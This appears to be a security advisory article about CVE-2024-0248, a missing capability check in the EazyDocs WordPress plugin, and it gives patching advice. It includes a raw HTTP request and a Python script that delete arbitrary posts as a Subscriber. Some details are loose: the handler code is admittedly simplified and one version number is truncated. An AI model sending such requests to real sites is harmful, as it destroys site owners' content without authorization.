CVE-2024-0248 - EazyDocs WordPress Plugin Flaw Lets Any User Delete Any Post

In the ever-evolving landscape of WordPress security, plugin vulnerabilities continue to surface, putting millions of sites and their users at risk. One such recent threat involves the popular EazyDocs plugin, which helps website owners create documentation for their products and services. Unfortunately, a serious issue—CVE-2024-0248—has been discovered, allowing even the lowest-level WordPress users to delete any post or modify key documents. This vulnerability was reintroduced in version 2.3.8 after being partially fixed before, making it a prime target for attackers.

In this article, we'll break down what CVE-2024-0248 is, how it can be exploited, and what steps users should take to secure their sites. We'll also include code snippets showing how the exploit works, and link to original sources for further reading.

Background: What Happened?

EazyDocs released version 2.3.8 with the intention of providing new features and security updates. However, this update accidentally reintroduced a critical flaw previously identified as CVE-2023-6029. The flaw allows any logged-in user—even the default Subscriber role—to:

- Add or delete documentation documents and sections.

The development team tried to patch it in version 2.3.9, but the issue was only partially fixed.

How the Attack Works

The heart of the problem is missing authorization on the plugin’s AJAX handlers. These endpoints let users create, update, or delete posts and documents with weak or no capability checks.

Example Vulnerable Code (Simplified)

// Inside EazyDocs plugin
add_action('wp_ajax_eazydocs_delete_post', 'eazydocs_delete_post_callback');

function eazydocs_delete_post_callback() {
    // UNSAFE: No capability check!
    $post_id = intval($_POST['post_id']);

    // Deletes any post submitted by ID
    wp_delete_post($post_id, true);
    echo 'success';
    wp_die();
}

This code lets any logged-in user delete any post simply by sending an AJAX request with its post ID. Nothing checks whether that user is actually allowed to delete it!
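The fix a defender wants to see is the same handler with a nonce check and a per-post capability check in front of the deletion. This hardened version is an added example, not EazyDocs’ own code; the nonce action name, the `eazydocs_nonce` request field and the `docs` post type are assumptions made for illustration.

```php
<?php
// Hardened counterpart to the vulnerable handler above (added example, not
// the plugin's actual code). Assumed: nonce action 'eazydocs_delete_post',
// request field 'eazydocs_nonce', and 'docs' as the documentation post type.

add_action('wp_ajax_eazydocs_delete_post', 'eazydocs_delete_post_callback_hardened');

function eazydocs_delete_post_callback_hardened() {
    // 1. CSRF protection: the request must carry a nonce minted for this action.
    //    check_ajax_referer() terminates the request with HTTP 403 if it is
    //    missing or expired.
    check_ajax_referer('eazydocs_delete_post', 'eazydocs_nonce');

    // 2. Input validation: absint() yields a non-negative integer, and
    //    get_post() confirms the ID refers to an existing post.
    $post_id = isset($_POST['post_id']) ? absint($_POST['post_id']) : 0;
    $post    = $post_id ? get_post($post_id) : null;
    if (!$post) {
        wp_send_json_error(array('message' => 'Invalid post ID.'), 400);
    }

    // 3. Scope: restrict the endpoint to the plugin's own post type so it can
    //    never be turned against pages, blog posts or other plugins' content.
    if ($post->post_type !== 'docs') {
        wp_send_json_error(array('message' => 'Not a documentation post.'), 400);
    }

    // 4. Authorization: ask WordPress whether THIS user may delete THIS post.
    //    The 'delete_post' meta capability maps to delete_posts,
    //    delete_others_posts and delete_published_posts, so a Subscriber is
    //    refused and an Author may only remove their own unpublished docs.
    if (!current_user_can('delete_post', $post_id)) {
        wp_send_json_error(array('message' => 'Insufficient permissions.'), 403);
    }

    // 5. Only now perform the destructive action, and report failure honestly.
    if (!wp_delete_post($post_id, true)) {
        wp_send_json_error(array('message' => 'Deletion failed.'), 500);
    }
    wp_send_json_success(array('deleted' => $post_id));
}

// The plugin's front-end script must include the nonce in the POST body; it is
// created server-side, e.g. when enqueuing the script:
//   wp_create_nonce('eazydocs_delete_post')
```

With these checks in place, the request shown in the exploit section below is rejected with HTTP 403 (no valid nonce), and even a request carrying a valid nonce fails the capability check for a Subscriber.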

Exploit Example: Deleting the Home Page

Let’s say you are a disgruntled subscriber. Here’s how you could exploit this using your browser or command line:

Step 1: Find any post ID to target. For example, the home page usually has ID 1.

Step 2: While logged in as a subscriber, send the following AJAX POST request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victims-site.com
Content-Type: application/x-www-form-urlencoded
Cookie: [your_wordpress_logged_in_cookie]

action=eazydocs_delete_post&post_id=1

If the flaw exists, this would delete the main page. You could repeat this for any post!

Here’s a simplified Python script showing how an attacker might automate this attack:

import requests

url = 'https://victims-site.com/wp-admin/admin-ajax.php'
cookies = {'wordpress_logged_in_xyz': 'your_subscriber_cookie_value'}

data = {
    'action': 'eazydocs_delete_post',
    'post_id': 1  # Target post ID
}

r = requests.post(url, data=data, cookies=cookies)
print(r.text)

You are at risk if:

- You use EazyDocs version 2.3.8 (or possibly earlier/later, if not fully patched).

- Your site allows user registration, even at Subscriber level.

The vulnerability was only partially patched in 2.3.9; it is fully fixed in version 2.4. and above.

What Should You Do?

1. Update Immediately: If you use EazyDocs, update to the latest version (2.4. or newer) from WordPress.org or the plugin page.

2. Check Your Site for Strange Activity: Look for unexplained post deletions or modifications, especially from low-level users.

3. Follow Security Resources:

- WPScan’s EazyDocs CVE-2023-6029 Advisory
- EazyDocs Changelog

References

- WPScan original report on CVE-2023-6029: Link
- EazyDocs plugin download & changelog: WordPress.org

Conclusion

CVE-2024-0248 is a perfect example of how security flaws in WordPress plugins can come back to haunt site owners. Even a minor update can reintroduce critical vulnerabilities! Stay vigilant, keep plugins updated, and always double check permissions and roles when using any third-party code.

If you’re an EazyDocs user, update now and review your site's user activity—don’t let a simple mistake lead to catastrophic content loss.

Timeline

Published on: 02/12/2024 16:15:08 UTC
Last modified on: 10/09/2024 13:11:10 UTC